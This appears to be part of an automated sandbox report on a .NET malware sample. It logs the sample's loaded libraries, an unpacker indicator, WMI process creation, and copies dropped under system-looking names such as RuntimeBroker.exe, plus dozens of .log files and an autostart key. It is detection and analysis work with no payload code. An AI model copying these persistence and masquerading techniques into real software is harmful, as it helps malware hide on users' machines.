                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: mscoree.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: version.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: wldp.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: profapi.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeSection loaded: sspicli.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                      Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDirectory created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDirectory created: C:\Program Files\Windows Portable Devices\557bb37d3fa657Jump to behavior
                      Source: 84JufgBTrA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 84JufgBTrA.exeStatic file information: File size 3511394 > 1048576
                      Source: 84JufgBTrA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.pdb source: 84JufgBTrA.exe, 00000000.00000002.1801490254.0000000003C10000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: 84JufgBTrA.exe, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: RuntimeBroker.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: MaEiPrsQRasQLtRzJjb.exe.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: MaEiPrsQRasQLtRzJjb.exe0.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: MaEiPrsQRasQLtRzJjb.exe1.0.dr, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"Jump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9B875D1E pushfd ; ret 0_2_00007FFD9B875D2B
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA2EAD9 pushad ; iretd 0_2_00007FFD9BA2EAEA
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA2EA01 pushad ; iretd 0_2_00007FFD9BA2EA1A
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeCode function: 0_2_00007FFD9BA2D7F1 push ebx; iretd 0_2_00007FFD9BA2D80A
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8B5D1E pushfd ; ret 41_2_00007FFD9B8B5D2B
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8D82E1 push eax; iretd 41_2_00007FFD9B8D82E2
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 41_2_00007FFD9B8D82DA push eax; iretd 41_2_00007FFD9B8D82DB
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 45_2_00007FFD9B8B5D1E pushfd ; ret 45_2_00007FFD9B8B5D2B
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 46_2_00007FFD9B895D1E pushfd ; ret 46_2_00007FFD9B895D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B895D1E pushfd ; ret 48_2_00007FFD9B895D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B8B82E1 push eax; iretd 48_2_00007FFD9B8B82E2
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 48_2_00007FFD9B8B82DA push eax; iretd 48_2_00007FFD9B8B82DB
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeCode function: 49_2_00007FFD9B8A5D1E pushfd ; ret 49_2_00007FFD9B8A5D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8B5D1E pushfd ; ret 50_2_00007FFD9B8B5D2B
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8D82E1 push eax; iretd 50_2_00007FFD9B8D82E2
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 50_2_00007FFD9B8D82DA push eax; iretd 50_2_00007FFD9B8D82DB
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8C82E1 push eax; iretd 52_2_00007FFD9B8C82E2
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8C82DA push eax; iretd 52_2_00007FFD9B8C82DB
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8A5D1E pushfd ; ret 52_2_00007FFD9B8A5D2B
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeCode function: 52_2_00007FFD9B8B3CB7 push ss; ret 52_2_00007FFD9B8B3CCA
                      Source: C:\Recovery\RuntimeBroker.exeCode function: 53_2_00007FFD9B895D1E pushfd ; ret 53_2_00007FFD9B895D2B

                      Persistence and Installation Behavior

                      barindex
                      Creates processes via WMI
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\xlsyLrRW.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\DNOFZBcI.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\qJFYyXNw.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\jdYrkeMJ.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\YKVbAlIQ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\BxjPijIe.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\XACLJBdm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\GbeNbtEV.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\fmuTYeTZ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\FGdoLyOG.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\iyARkwDy.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\wtLyrQzn.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\FPAovlhD.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\RjzUmbxe.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\LyGNneTv.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\BgcwUNOc.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\lWnZWaxI.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Program Files (x86)\WindowsPowerShell\Configuration\MaEiPrsQRasQLtRzJjb.exeJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\rcIHUqTf.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\yZwGwFNU.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\IIQWghSC.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\kvbZFwSt.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\ordqNcIm.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\LqWvJvsp.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\XbctOGCS.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\eqGsIhxV.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\zmagdNkm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\MUHnEZJK.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\FoaFqfIX.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\SWHMRrhv.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\pMdQdXyB.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\hKwJyjHA.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\WDaDoBOr.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\kZMRAajN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\LgDeSLNM.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\crpSXvpM.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\zXYOSFcP.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\VZqLtXxX.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\BKcXESYN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\yMEybVxl.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\tevppZXa.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\UPWuCoSt.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\aVrcADnQ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\bAMSHhIJ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\IeQwxcIQ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\QKxdLVJD.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\PTVdvIcA.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\dLiSHAoK.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\RHZlgVYy.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\cvDcQhTg.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\VMyCYnho.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\DvHnLgjG.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\nuBirctr.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\rcIHUqTf.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\iyARkwDy.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\aVrcADnQ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\YKVbAlIQ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\IIQWghSC.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\yZwGwFNU.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\ordqNcIm.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\VZqLtXxX.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\LqWvJvsp.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\DNOFZBcI.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\crpSXvpM.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\FGdoLyOG.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\DvHnLgjG.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\nuBirctr.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\dLiSHAoK.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\bAMSHhIJ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\LyGNneTv.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\BKcXESYN.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\tevppZXa.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\kvbZFwSt.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\RjzUmbxe.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\zXYOSFcP.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\hKwJyjHA.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\XbctOGCS.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\FPAovlhD.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile created: C:\Users\user\Desktop\xlsyLrRW.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\zmagdNkm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\QKxdLVJD.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\GbeNbtEV.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\wtLyrQzn.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\fmuTYeTZ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\WDaDoBOr.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\MUHnEZJK.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\BgcwUNOc.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\kZMRAajN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\cvDcQhTg.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\RHZlgVYy.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\IeQwxcIQ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\pMdQdXyB.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\XACLJBdm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\FoaFqfIX.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\lWnZWaxI.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\UPWuCoSt.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\LgDeSLNM.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\BxjPijIe.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\qJFYyXNw.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\PTVdvIcA.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\yMEybVxl.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\eqGsIhxV.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\VMyCYnho.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\jdYrkeMJ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeFile created: C:\Users\user\Desktop\SWHMRrhv.logJump to dropped file

                      Boot Survival

                      barindex
                      Creates an autostart registry key pointing to binary in C:\Windows
